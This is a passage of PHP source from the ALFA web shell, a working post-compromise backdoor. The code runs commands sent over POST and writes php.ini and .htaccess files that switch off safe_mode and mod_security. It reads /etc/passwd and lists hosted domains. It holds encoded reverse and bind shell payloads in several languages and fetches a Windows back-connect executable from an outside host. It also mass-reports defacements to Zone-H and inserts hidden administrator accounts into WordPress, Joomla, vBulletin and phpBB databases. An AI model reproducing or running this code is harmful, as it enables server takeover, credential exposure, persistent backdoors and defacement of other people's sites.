"; if(!empty($_POST['alfa1'])){ echo "
";
if(isset($GLOBALS["glob_chdir_false"])&&!empty($_POST["c"])){$cmd = "cd '".addslashes($_POST["c"])."';";}
echo alfaEx($cmd.$_POST['alfa1']);
echo '
'; } echo "
"; alfafooter(); } function alfasafe(){ alfahead(); echo "

| Auto ByPasser |
"; echo '

| PHP.INI | | .htaccess(apache) | | .htaccess(LiteSpeed) || Read-Passwd | | Read-Users | | Get-User | | Get-Domains |

'; if(!empty($_POST['alfa8']) && isset($_POST['alfa8']) == 'domains'){ if(!_alfa_file_exists("/etc/virtual/domainowners")){ echo __pre(); $solevisible9 = _alfa_file('/etc/named.conf'); if(is_array($solevisible9)){ foreach($solevisible9 as $solevisible13){ if(@eregi('zone',$solevisible13)){ preg_match_all('#zone "(.*)"#',$solevisible13,$solevisible14); if(strlen(trim($solevisible14[1][0])) > 2){ echo $solevisible14[1][0].'
'; }}} } }else{ echo __pre(); $users = _alfa_file("/etc/virtual/domainowners"); if(is_array($users)){ foreach($users as $boz){ $dom = explode(":",$boz); echo $dom[0]."\n";}}}} if(!empty($_POST['alfa6']) && isset($_POST['alfa6']) == 'valiases'){ echo '
Url:
'; if(isset($_POST['alfa9']) && $_POST['alfa9'] == '>>'){ if(!_alfa_file_exists("/etc/virtual/domainowners")){ $site = trim($_POST['alfa7']); $rep = str_replace(array("https://","http://","www."),"",$site); $user = ""; if(function_exists("posix_getpwuid") && function_exists("fileowner")){ if($user = @posix_getpwuid(@fileowner("/etc/valiases/{$rep}"))){ $user = $user['name']; } }else{ if(_alfa_can_runCommand(true,true)){ $user = alfaEx("stat -c '%U' /etc/valiases/".$rep); } } if(!empty($user)&&$user!='root'){ echo __pre()."
User: {$user}
site: {$rep}
"; }else {echo __pre().'
No such file or directory Or Disable Functions is not NONE...
';} }else{ $site = trim($_POST['alfa7']); $rep = str_replace(array("https://","http://","www."),"",$site); $users = _alfa_file("/etc/virtual/domainowners"); foreach($users as $boz){ $ex = explode(":",$boz); if($ex[0] == $rep){ echo __pre()."
User: ".trim($ex[1])."
site: {$rep}
";break;}}}}} if(!empty($_POST['alfa5']) && isset($_POST['alfa5'])){ if(!_alfa_file_exists("/etc/virtual/domainowners")){ echo __pre(); $i = 0; while ($i < 60000) { $line = @posix_getpwuid($i); if (!empty($line)) { while (list ($key, $vl) = each($line)){ echo $vl."\n"; break;}}$i++;} }else{echo __pre(); $users = _alfa_file("/etc/virtual/domainowners"); foreach($users as $boz){ $user = explode(":",$boz); echo trim($user[1]).'
';}}} if(!empty($_POST['alfa4']) && isset($_POST['alfa4'])){ echo __pre(); if(_alfa_can_runCommand(true,true)){echo __read_file("/etc/passwd");}elseif(function_exists("posix_getpwuid")){ for($uid=0;$uid<60000;$uid++){ $ara = @posix_getpwuid($uid); if(!empty($ara)){ while(list ($key, $val) = each($ara)){ echo "$val:"; }echo "\n";}} }else{__alert('failed...');}} if(!empty($_POST['alfa2']) && isset($_POST['alfa2'])){ @__write_file($GLOBALS['cwd'].".htaccess","#Generated By Sole Sad and Invisible\n\nSec------Engine Off\nSec------ScanPOST Off\n"); echo '
htaccess for Apache created...!
'; } if(!empty($_POST['alfa1'])&& isset($_POST['alfa1'])){ @__write_file($GLOBALS['cwd']."php.ini","safe_mode=OFF\ndisable_functions=ByPassed By Sole Sad & Invisible(ALFA TEaM)"); echo '
php.ini created...!
'; } if(!empty($_POST['alfa3']) && isset($_POST['alfa3'])){ @__write_file($GLOBALS['cwd'].".htaccess","#Generated By Sole Sad and Invisible\n\nForceType application/x-httpd-php4\n\n\nSecFilterEngine Off\nSecFilterScanPOST Off\n"); echo '
htaccess for Litespeed created...!
'; } echo "
"; alfafooter(); } function __get_resource($content){ return @gzinflate(__ZGVjb2Rlcg($content)); } function __write_file($file, $content){ if($fh = @fopen($file, "wb")){ if(fwrite($fh, $content)!==false) return true; } return false; } function bcinit($evalType, $evalCode, $evalOptions, $evalArguments){ $res = "[ Success...! ]"; $err = "[ Failed...! ]"; if($evalOptions!="") $evalOptions = $evalOptions." "; if($evalArguments!="") $evalArguments = " ".$evalArguments; if($evalType=="c"){ $tmpdir = ALFA_TEMPDIR; chdir($tmpdir); if(is_writable($tmpdir)){ $uniq = substr(md5(time()),0,8); $filename = $evalType.$uniq.".c"; $path = $filename; if(__write_file($path, $evalCode)){ $ext = ($GLOBALS['sys']=='win')? ".exe":".out"; $pathres = $filename.$ext; $evalOptions = "-o ".$pathres." ".$evalOptions; $cmd = "gcc ".$evalOptions.$path; alfaEx($cmd); if(is_file($pathres)){ if(chmod($pathres, 0755)){ $cmd = $pathres.$evalArguments; alfaEx($cmd); }else{$res = $err;} unlink($pathres); }else{$res = $err;} unlink($path); }else{$res = $err;} } return $res; }elseif($evalType=="java"){ $tmpdir = ALFA_TEMPDIR; chdir($tmpdir); if(is_writable($tmpdir)){ if(preg_match("/class\ ([^{]+){/i",$evalCode, $r)){ $classname = trim($r[1]); $filename = $classname; }else{ $uniq = substr(md5(time()),0,8); $filename = $evalType.$uniq; $evalCode = "class ".$filename." { ".$evalCode . " } "; } $path = $filename.".java"; if(__write_file($path, $evalCode)){ $cmd = "javac ".$evalOptions.$path; alfaEx($cmd); $pathres = $filename.".class"; if(is_file($pathres)){ if(chmod($pathres, 0755)){ $cmd = "java ".$filename.$evalArguments; alfaEx($cmd); }else{$res = $err;} unlink($pathres); }else{$res = $err;} unlink($path); }else{$res = $err;} } return $res; } return false; } function alfaconnect(){ alfahead(); $php="7VZta9swEP5e6H9QjaE2S5uXfhg0pDBYPw7KVtiHtjOOLNcitqVJ8pKxpb99d36L4zid17WwQV1wrbvTo0e6Oz1hSgnlKSaFMjy9d0bu9PBAM+MZnjAv5gk3hU3MPZ7ImFNuvDDOdOSg1Ta+umdGkxlhKxmLgDkWsQaktOchFL3js7O3OFj6MEizOMYBaw50BAMLUIAJub78+GG2Mkwl06tP49nxrX31+f3F8bR0g206nPN0CJNOuIXTE5z9QN7FoU+umZ8QHbE4Jg/k8AD9PCQOFVlqnIqyS2ZAyyU/Dg8IPLYEgNI3LU05I6saGRzBogFa1oTFmu1BnXSi6pvRXRO5No/vtpfw6SJfomAdZik1XKQeW3FttHMsaWpiLxRqcew2FuIBTN748vSgBzEK74yc4IYBxzjjtru0j5p2KTRfeVANmgeO2wFQUkTe1dlsGGHatVGQC08LuoCa0kx9Y8qxDJXnw+HoNP87t8gp0IeaYUqlovgP8yoiFURZkyKDw9YDclYztenOQj6lTGJcczcQYkQslsBAZ3MYOTKSXpb6CXPcARkBpptv0lrydLMPfMKl4oY5NgV2CdCFtNElHskpsS6sahF8lhGPGZ4oOQKk0Ici2UKqiyLE1ANic3J97orde4lvaORYQxrcEufmy62+e+MOOfYWnpVS7g5ujh1gGYB7U1VtdK69gCsHIgGCRtV3R7QtAGt7r62oTRsYxZPmEduyPEysFov8/En2RnzNIMIlc8jgooWP6AUNHxr7coWTkIi1k4TWxGbGRHNv60ZWaSw0a+WgMtalU2xxbzU059oB1ryvlP/dGZHZRflpSS4ZJM5SFtTZuMOxRMek27G1gFTY5EpQT0iWAstogKtiUXDZjMSUHEGmFdMiUxTYSqyY7d7Hp9Fe8xi6B0UAweCygp7oFTnuHTnpFUlbQWVPGZXt9lJ+QzIRYhaxyIrvgpXbXVO28uss5Tms9lBSbHdCzTFmFO4U5UPkEl8MXqheXS3MU6+xgvL3dCvHmwDggyKO6q42rOqtyorN21HrxwjU2+vDog5+nAp9EovJn7CY/D2Ljl7XXb3eeQEUp73PM97r2S6gvFcrb61p6+YPiEo9Ufa31TNEOSsaPSrvfZbia0v/nknb9LNr207uXrWtib9P2+AHa1910z3UrYeQ6VchexEh008SMv0kIdMvLmS65+Wt/ych0/+EkP2ORV8he2nN+gU="; $python="pVRtT9swEP6cSv0PxptWR80M7YY0wYJUQZjQBlRtp30AVqXOpYmWOpHtQPnCb5/tJG1AHUKaqra+V99z95zf7e2XUuwvUr4P/B4VjyrJebeTropcKCTAk+WiEDkDKb1cevJRf3P2B5Sn0hV0O4WPcbeT2N8IYiQTyDLC3KNuxzFx/jaejvMCOGGe9fFnotTZVZSX6pnTxTgwahBilzrlL7WuvkmAKgVHRk2rlFRAGBG336h0upZqVSjiUuAsj4D0ShV//NLTeSoIIVNpzmsMaYxySXm4gj0fc4WNzol9RuM0A54Tc7ujPXRjFKwIhrVt3CyYXPprBWJ1PJ4O/N778a+zk95xbdWqY9tymaCPKfr6AfelEiR2+xidtIXhVjIXQSbBFvCQ6NuR6aAVHSUeq4MjdGkC2D0ZHAw/uzQCCxFbiNgW68CaQaFq/yKUstI2uR2DWWMjwj05qDXOwhdAJYSCJQSz6BaRm9+38q7vYk94cRYupXG4+HZ1PQlOR9PAreN0qkWTo+5lEaqEpjJKBVnQpcjLggxcd+NkmsmSF9bGqEcJPCL/mmDj18Ki8xl+WVYKt11JqVDII4tUnw3WOruRKkebB9XkOg+11HCkqeBoSz58y3FfF78ExR4Mz/CJ3omlr5lBQ7G810tV9XXp+v7Q7oe/vBncdTuQtSyf2hYn0YehddGVwDpVuhtm6VKuSKFP0q+2kVZ/pJZG5/OLq2BWryqdXp9+n09nk2B0aWI0TGUsebEJmF7/mBuvdsx8EvycBqOzs4lnLn1ZvaSawREh+IDaD/YKOwBJs1TvAieHRjLM1Csfur7uAjPEsyvT4qB5R6jMAAqLbTu8navXUIDgJzTK4hDNIFyhqZkvetIT2M2JLSFeC8ebp2F3ls3D8KwZdmAGJtLEzTkHpghJ6mbsxnn4Bpzy/3C+Fv5GnNL9Cw=="; $perl="lZLRjpNAFIav26TvMOJsC8kYWr1bpJFQ3DRrS8OwGmOVsPSsTKQDgVm3m+722Z0BVifGGL0755/Dd+Abnj+zb5vavmbcBv4dVVAXo+FtA2gZnp/TMvsGwhkNcdm4+EuoqiZ3DThUZS1QHEQr9yCg3jsbOnMnW7z5sNjOJ05/LkOnJTc5esEM+TS7MRXqtLfvZMysY4s788MV3QT+GbIvDedRLhHuVxBVXYry+p6nezAnIqsmliQ07SuZlIw3b5PlOojJmIb+ZULjKPBWBAvr4WHHwLS6bW+86OK9686s42g4wJWLVf9p+lmeDhoQilZWCkfDd4kCSSANkyi4ooG3WERkpkAD+RE7OaTG092uThg3cUWWazWSeOuPlrZ1ULBGAJfjr/Q0zTKQm3xCrW65JPrEOCGvuElRDOke0RyKAp223CDTdqisgCMaL5ZrYrwe+4bzFIRXMTHmehJEUZ/I5+AAGZJqtfVZUTZg+pbTFfRnoehaI8laJ6lWB2QCTWUlLweK5pfYl38Si/O+nXUtcxkHkaSilNpyXQpO3d+cYqafZyXnkKn7wamet/boP9gze3vzMTUs5ynp9elR709FfxP4f946W3BU+kz5Jz3+AA=="; $ruby="tVb7b9M6FP7Z+SuMN0hzVxLGQ+h2N6vGU0ggqjG4QmQXtc5pYy11gu3QoW387fiVrqXt1ivd66p1es7n8/T52p07SSNFMmI8Af4di2b0I9jBhVK17CXJhKmiGcW0miajR08fn7nPQMC3hgnAoazoGajwWlAPVcGHUwiDIIcxlg09kwESoBrB8fHHZ5+/Dt4enbx6f/wuzqsZp0MJ8XSoaNEJp3LG+KV5TxmfzMKor0QDvfGwlBAAz51FAcPSOOlIJSJtOdV7gNgYv2IlxHDOpJJ9r9TagY8n5jCz0rg1EKvqqw7NGDbHbaRYFcCxSEU8kc2ok2RJ0iVZRiJsYT4N4aLRh46OX3+KS+ATVaTpfoD1MqIvD07Tn8k/Xx7c//P0Yr/75Go36dfpG65gAqLjEVFPB6vsGZmePB98APEdhI2TkG4dWQ1NZTykFGoHpHEtGFeY2DZgWUBZ4h6mFedAFeQZJxY3ggnj9sksHSivlO8FXljjlJoqsCUhnAPF0voZdwic15VQ+OTl8bv0XIGYHgw+7Kdhtjv4+0V2GB54vRYe2DskC3yf4eyv7N7dHGeHdnvodtIdm1c09wamsYuu2/TmPSYxifbIIVlCzQrdaVzq2CeglhMySwyZBAxCVOKZqEzypWlGziAT/d1kBe+rU8a0qKZ1mhKyAvEwY4fmOP4jYWshZpVp6e+ORiasG4aRM7zxRHt1cz0/VFXiR79TRhvRzse8QLcgXzChvWvLNwHNZd6k264jCw31ZcpmvRvLtC5pV6etE7oN/p+mBRtNvXkf11UNvFN2iSDRxSWrLlvzrDJsk+8RPZd7K76ugm3D/l22+L19FiBpc33vNfnN6QW4bMR1BjKmZbWQkUw5K4PWluvhErE9tAS5gdi0o1VqO9DSIrXf9k81x5oC+oAc4TrGsz8ejvF2Loory3pIbsFxyBEcQkvUhhAaa760jIaMu/+byFCb2Tzo1QullS1hSUdYWoJuISkbP1rDTMjLF6nIytBm4kHtoTU0g9rDi4zihUvk4US2d3bdmLCty29MsDmKdpBX3S5r/o1z8Mh10ym3nM4lp353m/8zsHbgkJ82E6WbM/1kJwz58XKTZ8FG8gs="; $node="nVHLasMwEDwrkH8QvliCoEDTW8ih9BPSW/pAtdeRQJZcSXYKIfn2yrKd5tGWYh+Ed2d2NDtquMWu4juNV9jCRy0tkDQTUuVvlTUZOJdSFgnL6aQJZA3+nBrKlPaQ8xZ4eY52nRMhM9oZBRdXda1I6VUEKBUo6fxd6rkTaUBkQXo3rFLcF8aWrOQ+E2T+ugssSen3XFbmDD4hPSlyu20CMCi0ZafZ/jEFeuvFarWg++kEtXwRyGEvlgXzHtZgG7CkqHXmpdHERR5ybGelB5Ic8YMqOH5qV19HD8dnnbT74P7rtgqiMUcSjZ7jTjDnc6mZBVeXQOg1ZGrPws1Jzj1PZoMTTNqa7gcnsVoebpXB2pHjf40Npm+mUXcKpqTzoGPKm7uXtnmYTkA5wNfZ35+ydxfZPxqtoYu9V5nF19wsotx/HgH9lj76IXY0Mm80Mmg0LuHDFw=="; $c="tVJtb9owEP7cSv0PHp1ap/WAsO0TTaWoZBLaChHJNE0bilLHNKcZG8Vmgk7rb98lBArZi/alUqzcPff47nzPnYLicpkJcmVsBrqdX58cn+5hBaj738BMwl0TXJuOXS+E+QNuNP8mbCOghAU8HVCNwFIBVqhAUJbMU1C0NNLinjOepwW5QPP7l6nz4+T4qIwYxpn23D662PCSI4IV0ywrElAEShxmtLzveb3q1hG0Dahkls5Brj3/XTIcBXH/KbDQhfVyq5WhqdVAq4Lu1HH2OGX+tql+FVXS4cgfDCaJP/q84Rlv83JaF2DR+OZ9EsWTwL9l3ZojbEnSC0sNxj8kJaeiJpPgYxSUGdmZZgYehJ5RvW1hRl8YR6zA0jrRHagMU9DGBMiFcwasu3JrmsThCoXEtxufeynnoqrefeoJU3HWeiS+nKUkFumcRLmQkjx+VS3We7MlZstFD4mHnnvg9eqUayw7py2xKkdL4mBy662sKOb9MHK985fhp8H1eb+OIoSm4KSDj+qYnLyCVt2t1EZQXjk/8QhpBNlp+/pZtC23tLI2zN60nveDKPQWYjh1iWPdMi7dy31kl/2fGzEMw8k4HifxTbgTmXKtlOD2r8rWe9GIOY5z1T1Yj0pT87+amobnHnjPoanZaorfLw=="; $java="lVRNb9swDD2nQP+D4JM9BG6T04bCwz6ww4ABHZbeuhwUhbG12rIg0XGCNPvtoz7sumsvPdiWyCfy8ZGybHRrkP3he57LNn93c3khJyYF6G2XF7rb1FIwUXNrGa93/A54c7q8mGkj9xyBWeRIgJ1UvI4wjQwOCGpr2V1lgG8dfjzwXekOV0j2hkl7M3Xddvjkazv0DMgdOGhMn5+dvziQnbCSNpe2oMh+ScbCRTqHUJ9u92CM3MIk7r6VW2Y6lWae5wzNMSxmmyPC/ZptWMEU9Mxv3y8+LNc3wS8VMkFOyuPKTDdZdPSVrCEVH4vrjMVYM2KR90YipJv59VwMUG/f1Z2t0tH0asyz/4S34Ciq9NtBgEbZKgbZCXJSUZEWXDzcGS6Awnmwe4XqY72xY77shkuVkn5SlVQoN6UNIrjK3Dj43MHPRLMlXsnVRqorWyXeJXfp6mgRmrwE/GlaDQaPadLaXPEGkizH9kfbg/nKLRHKpdrC4XaXJr1USebkOcWo9EkC35itd9a/7DONHHMzx1YV1DX7+1uFzJPe9C75F9rbKOGqFQ+ArIp9C9voG7tL1F29eQ2qxKooFrH9M38NCppThBJMrrmxQBuPvr9eD/1YgaFZiqnskGpiTF2gAe242JwL17Gh0aGXUFtg/5NZvpVMEE1qwnrXYj1JPBFB6jmb8Dq/LgV7fGSv85newFK6siun/sQ8jvGzy1m2I3ZqH8HkH27HYKJxEuB+J3TwV6dQNuCOxyVNExxApDQ4WfxPkFo0tYtYMOmsX1CbOyJDAodePqFL90fRLxmO8EVOV8e49unluHyS0b/ecDPpOf8D"; echo "

| Back Connect |


"; echo "
Mehtod:
Use:
IP:
Port:

Run ` nc -l -v -p port ` on your computer and press ` >> ` button


"; if(isset($_POST['alfa1'])&&!empty($_POST['alfa1'])){ $lang = $_POST['alfa1']; $ip = $_POST['alfa2']; $port = $_POST['alfa3']; $arg = ($_POST['alfa4']=='bind'?$port:$port.' '.$ip); $tmpdir = ALFA_TEMPDIR; $name = $tmpdir.'/'.$lang.uniqid().rand(1,99999); $allow = array('perl','ruby','python','node'); eval('$lan=$'.$lang.';'); if(in_array($lang,$allow)){ if(__write_file($name,__get_resource($lan))){ if(_alfa_can_runCommand(true,true)){ $os = ($GLOBALS['sys']!='win')?'1>/dev/null 2>&1 &':''; $out = alfaEx("$lang $name $arg $os"); if($out==''){$out="
[ Finished...! ]
";} echo("
{$out}
"); } }else{ echo("
[ Failed...! ]
"); } } if($lang=='java'||$lang=='c'){ $code = __get_resource($lan); $out = nl2br(bcinit($lang, $code,'','')); echo("
{$out}
"); } if($lang=='bcwin'){ $alfa = new AlfaCURL(); $s = $alfa->Send('http://solevisible.com/bc/windows.exe'); $tmpdir = ALFA_TEMPDIR; $f = @fopen($tmpdir.'/bcwin.exe','w+'); @fwrite($f, $s); @fclose($f); $out = alfaEx($tmpdir."/bcwin.exe ".$_POST['alfa2']." ".$_POST['alfa3']); } if($lang=='php'){ echo "
";
$code = __get_resource($lan);
if($code!==false){
$code = "\$target = \"".$arg."\";\n".$code;
eval($code);
echo("
[ Finished...! ]
"); } echo "
"; } } echo "
"; alfafooter(); } function alfazoneh(){ alfahead(); echo '
'; if(!function_exists('curl_version')){ echo "
PHP CURL NOT EXIST ~ ZONE H MASS POSTER DOES NOT WORK
"; } $hackmode = array('known vulnerability (i.e. unpatched system)','undisclosed (new) vulnerability','configuration / admin. mistake','brute force attack','social engineering','Web Server intrusion','Web Server external module intrusion','Mail Server intrusion','FTP Server intrusion','SSH Server intrusion','Telnet Server intrusion','RPC Server intrusion','Shares misconfiguration','Other Server intrusion','SQL Injection','URL Poisoning','File Inclusion','Other Web Application bug','Remote administrative panel access bruteforcing','Remote administrative panel access password guessing','Remote administrative panel access social engineering','Attack against administrator(password stealing/sniffing)','Access credentials through Man In the Middle attack','Remote service password guessing','Remote service password bruteforce','Rerouting after attacking the Firewall','Rerouting after attacking the Router','DNS attack through social engineering','DNS attack through cache poisoning','Not available','Cross-Site Scripting'); $reason = array('Heh...just for fun!','Revenge against that website','Political reasons','As a challenge','I just want to be the best defacer','Patriotism','Not available'); echo '

| Zone-h Mass Poster |





'; if($_POST['alfa5'] && $_POST['alfa5'] == '>>'){ ob_start(); $hacker = $_POST['alfa1']; $method = $_POST['alfa2']; $neden = $_POST['alfa3']; $site = $_POST['alfa4']; if(empty($hacker)){ die (__pre()."
[+] YOU MUST FILL THE ATTACKER NAME [+]
"); }elseif($method == "------------------------------------SELECT-------------------------------------"){ die(__pre()."
[+] YOU MUST SELECT THE METHOD [+]
"); }elseif($neden == "------------------------------------SELECT-------------------------------------"){ die(__pre()."
[+] YOU MUST SELECT THE REASON [+]
"); }elseif(empty($site)){ die(__pre()."
[+] YOU MUST INTER THE SITES LIST [+]
"); } $i = 0; $sites = explode("\n", $site); $alfa = new AlfaCURL(); while($i < count($sites)){ if(substr($sites[$i], 0, 4) != "http"){ $sites[$i] = "http://".$sites[$i]; } $alfa->Send("http://www.zone-h.com/notify/single","post","defacer=".$hacker."&domain1=". $sites[$i]."&hackmode=".$method."&reason=".$neden); ++$i; } echo __pre()."
[+] Sending Sites To Zone-H Has Been Completed Successfully !!![+]
"; } echo "
"; alfafooter(); } function alfapwchanger(){ alfahead(); echo '

| Add New Admin |

'; $vals = array('WordPress' => array('wp',2),'Joomla' => array('joomla',3),'vBulletin' => array('vb',5),'phpBB' => array('phpbb',6),'WHMCS' => array('whmcs',7),'MyBB' => array('mybb',8),'Php Nuke' => array('nuke',9),'Drupal' => array('drupal',10),'SMF' => array('smf',11)); Alfa_Create_A_Tag('pwchanger',$vals); echo '

'; if(isset($_POST['alfa1'])&&$_POST['alfa1']=='wp'){ echo __pre().'
| WordPress |

'.getConfigHtml('wp').'

'; $table = array('td1' => array('color' => 'FFFFFF', 'tdName' => 'Mysql Host','id'=>'db_host', 'inputName' => 'localhost', 'inputValue' => 'localhost', 'inputSize' => '50'), 'td2' => array('color' => 'FFFFFF', 'tdName' => 'Db Name', 'id'=>'db_name','inputName' => 'database', 'inputValue' => '', 'inputSize' => '50'), 'td3' => array('color' => 'FFFFFF', 'tdName' => 'Db User', 'id'=>'db_user','inputName' => 'username', 'inputValue' => '', 'inputSize' => '50'), 'td4' => array('color' => 'FFFFFF', 'tdName' => 'Db Pass', 'id'=>'db_pw','inputName' => 'password', 'inputValue' => '', 'inputSize' => '50'), 'td5' => array('color' => 'FFFFFF', 'tdName' => 'Table Prefix', 'id'=>'db_prefix','inputName' => 'prefix', 'inputValue' => 'wp_', 'inputSize' => '50'), 'td6' => array('color' => 'FF0000', 'tdName' => 'Admin User', 'inputName' => 'admin', 'inputValue' => 'admin', 'inputSize' => '50'), 'td7' => array('color' => 'FF0000', 'tdName' => 'Admin Pass', 'inputName' => 'kh', 'inputValue' => 'solevisible', 'inputSize' => '50', 'disabled' => true), 'td8' => array('color' => 'FF0000', 'tdName' => 'Admin Email', 'inputName' => 'email', 'inputValue' => 'solevisible@fbi.gov', 'inputSize' => '50') ); create_table($table); echo '

'; if ($_POST['alfa2'] && $_POST['alfa2'] == '>>'){ $localhost = $_POST['alfa3']; $database = $_POST['alfa4']; $username = $_POST['alfa5']; $password = $_POST['alfa6']; $admin = $_POST['alfa8']; $SQL = $_POST['alfa9']; $prefix = $_POST['alfa10']; $conn=@mysqli_connect($localhost,$username,$password,$database) or die(mysqli_error($conn)); $solevisible=@mysqli_query($conn,"insert into ".$prefix."users (ID,user_login,user_pass,user_email) values(null,'$admin','d4a590caacc0be55ef286e40a945ea45','$SQL')") or die(mysqli_error($conn)); $solevisible=@mysqli_query($conn,"select ID from ".$prefix."users where user_login='".$admin."'") or die(mysqli_error($conn)); $sole = @mysqli_num_rows($solevisible); if ($sole == 1){ $solevis = @mysqli_fetch_assoc($solevisible); $res = $solevis['ID']; } $solevisible=@mysqli_query($conn,"insert into ".$prefix."usermeta (umeta_id,user_id,meta_key,meta_value) values(null,'".$res."','first_name','solevisible'),(null,'".$res."','last_name','solevisible'),(null,'".$res."','nickname','solevisible'),(null,'".$res."','description','solevisible'),(null,'".$res."','rich_editing','true'),(null,'".$res."','comment_shortcuts','false'),(null,'".$res."','admin_color','fresh'),(null,'".$res."','use_ssl','0'),(null,'".$res."','show_admin_bar_front','true'),(null,'".$res."','".$prefix."capabilities','a:1:{s:13:\"administrator\";b:1;}'),(null,'".$res."','".$prefix."user_level','10'),(null,'".$res."','show_welcome_panel','1'),(null,'".$res."','".$prefix."dashboard_quick_press_last_post_id','3')") or die(mysqli_error($conn)); if($solevisible){ __alert('Success... '.$admin.' is created...');} } } if($_POST['alfa2'] && $_POST['alfa2'] == 'joomla'){ echo __pre().'
| Joomla |

'.getConfigHtml('joomla').'

'; $table = array('td1' => array('color' => 'FFFFFF', 'tdName' => 'Mysql Host', 'id'=>'db_host','inputName' => 'localhost', 'inputValue' => 'localhost', 'inputSize' => '50'), 'td2' => array('color' => 'FFFFFF', 'tdName' => 'Db Name', 'id'=>'db_name','inputName' => 'database', 'inputValue' => '', 'inputSize' => '50'), 'td3' => array('color' => 'FFFFFF', 'tdName' => 'Db User', 'id'=>'db_user','inputName' => 'username', 'inputValue' => '', 'inputSize' => '50'), 'td4' => array('color' => 'FFFFFF', 'tdName' => 'Db Pass', 'id'=>'db_pw','inputName' => 'password', 'inputValue' => '', 'inputSize' => '50'), 'td5' => array('color' => 'FFFFFF', 'tdName' => 'Table Prefix', 'id'=>'db_prefix','inputName' => 'prefix', 'inputValue' => 'jos_', 'inputSize' => '50'), 'td6' => array('color' => 'FF0000', 'tdName' => 'Admin User', 'inputName' => 'admin', 'inputValue' => 'admin', 'inputSize' => '50'), 'td7' => array('color' => 'FF0000', 'tdName' => 'Admin Pass', 'inputName' => 'toftof', 'inputValue' => 'solevisible', 'inputSize' => '50', 'disabled' => true), 'td8' => array('color' => 'FF0000', 'tdName' => 'Admin Email', 'inputName' => 'email', 'inputValue' => 'solevisible@fbi.gov', 'inputSize' => '50') ); create_table($table); echo '

'; if ($_POST['alfa1'] && $_POST['alfa1'] == '>>'){ $localhost = $_POST['alfa3']; $database = $_POST['alfa4']; $username = $_POST['alfa5']; $password = $_POST['alfa6']; $admin = $_POST['alfa8']; $SQL = $_POST['alfa9']; $prefix = $_POST['alfa10']; $conn=@mysqli_connect($localhost,$username,$password,$database) or die(mysqli_error($conn)); $solevisible=@mysqli_query($conn,"insert into ".$prefix."users (id,name,username,email,password) values(null,'Super User','".$admin."','".$SQL."','d4a590caacc0be55ef286e40a945ea45')") or die(mysqli_error($conn)); $solevisible=@mysqli_query($conn,"select id from ".$prefix."users where username='".$admin."'") or die(mysqli_error($conn)); $sole =@mysqli_num_rows($solevisible); if ($sole == 1){ $solevis =@mysqli_fetch_assoc($solevisible); $res = $solevis['id']; } $solevisible=@mysqli_query($conn,"INSERT INTO ".$prefix."user_usergroup_map (user_id,group_id) VALUES ('".$res."', '8')") or die(mysqli_error($conn)); if($solevisible){ __alert('Success... '.$admin.' is created...');} } } if($_POST['alfa4'] && $_POST['alfa4'] == 'vb'){ echo __pre().'
| vBulletin |

'.getConfigHtml('vb').'

'; $table = array('td1' => array('color' => 'FFFFFF', 'tdName' => 'Mysql Host', 'id'=>'db_host','inputName' => 'localhost', 'inputValue' => 'localhost', 'inputSize' => '50'), 'td2' => array('color' => 'FFFFFF', 'tdName' => 'Db Name', 'id'=>'db_name','inputName' => 'database', 'inputValue' => '', 'inputSize' => '50'), 'td3' => array('color' => 'FFFFFF', 'tdName' => 'Db User', 'id'=>'db_user','inputName' => 'username', 'inputValue' => '', 'inputSize' => '50'), 'td4' => array('color' => 'FFFFFF', 'tdName' => 'Db Pass', 'id'=>'db_pw','inputName' => 'password', 'inputValue' => '', 'inputSize' => '50'), 'td5' => array('color' => 'FFFFFF', 'tdName' => 'Table Prefix', 'id'=>'db_prefix','inputName' => 'prefix', 'inputValue' => '', 'inputSize' => '50'), 'td6' => array('color' => 'FF0000', 'tdName' => 'Admin User', 'inputName' => 'admin', 'inputValue' => 'admin', 'inputSize' => '50'), 'td7' => array('color' => 'FF0000', 'tdName' => 'Admin Pass', 'inputName' => 'hi', 'inputValue' => 'solevisible', 'inputSize' => '50', 'disabled' => true), 'td8' => array('color' => 'FF0000', 'tdName' => 'Admin Email', 'inputName' => 'email', 'inputValue' => 'solevisible@fbi.gov', 'inputSize' => '50') ); create_table($table); echo '

'; if($_POST['alfa1'] && $_POST['alfa1'] == '>>'){ $localhost = $_POST['alfa2']; $database = $_POST['alfa3']; $username = $_POST['alfa5']; $password = $_POST['alfa6']; $prefix = $_POST['alfa7']; $admin = $_POST['alfa8']; $SQL = $_POST['alfa9']; $conn=@mysqli_connect($localhost,$username,$password,$database) or die(mysqli_error($conn)); $solevisible=@mysqli_query($conn,"insert into {$prefix}user (userid,usergroupid,username,password,salt,email,passworddate,joindate) values(null,'6','$admin','52e28b78f55641cd4618ad1a20f5fd5c','Xw|IbGLhTQA-AwApVv>61y^(z]*
| phpBB |

'.getConfigHtml('phpbb').'

'; $table = array('td1' => array('color' => 'FFFFFF', 'tdName' => 'Mysql Host', 'id'=>'db_host','inputName' => 'localhost', 'inputValue' => 'localhost', 'inputSize' => '50'), 'td2' => array('color' => 'FFFFFF', 'tdName' => 'Db Name', 'id'=>'db_name','inputName' => 'database', 'inputValue' => '', 'inputSize' => '50'), 'td3' => array('color' => 'FFFFFF', 'tdName' => 'Db User', 'id'=>'db_user','inputName' => 'username', 'inputValue' => '', 'inputSize' => '50'), 'td4' => array('color' => 'FFFFFF', 'tdName' => 'Db Pass', 'id'=>'db_pw','inputName' => 'password', 'inputValue' => '', 'inputSize' => '50'), 'td5' => array('color' => 'FFFFFF', 'tdName' => 'Table Prefix', 'id'=>'db_prefix','inputName' => 'prefix', 'inputValue' => '', 'inputSize' => '50'), 'td6' => array('color' => 'FF0000', 'tdName' => 'Admin User', 'inputName' => 'admin', 'inputValue' => 'admin', 'inputSize' => '50'), 'td7' => array('color' => 'FF0000', 'tdName' => 'Admin Pass', 'inputName' => 'toftof', 'inputValue' => 'solevisible', 'inputSize' => '50', 'disabled' => true), 'td8' => array('color' => 'FF0000', 'tdName' => 'Admin Email', 'inputName' => 'email', 'inputValue' => 'solevisible@fbi.gov', 'inputSize' => '50') ); create_table($table); echo '

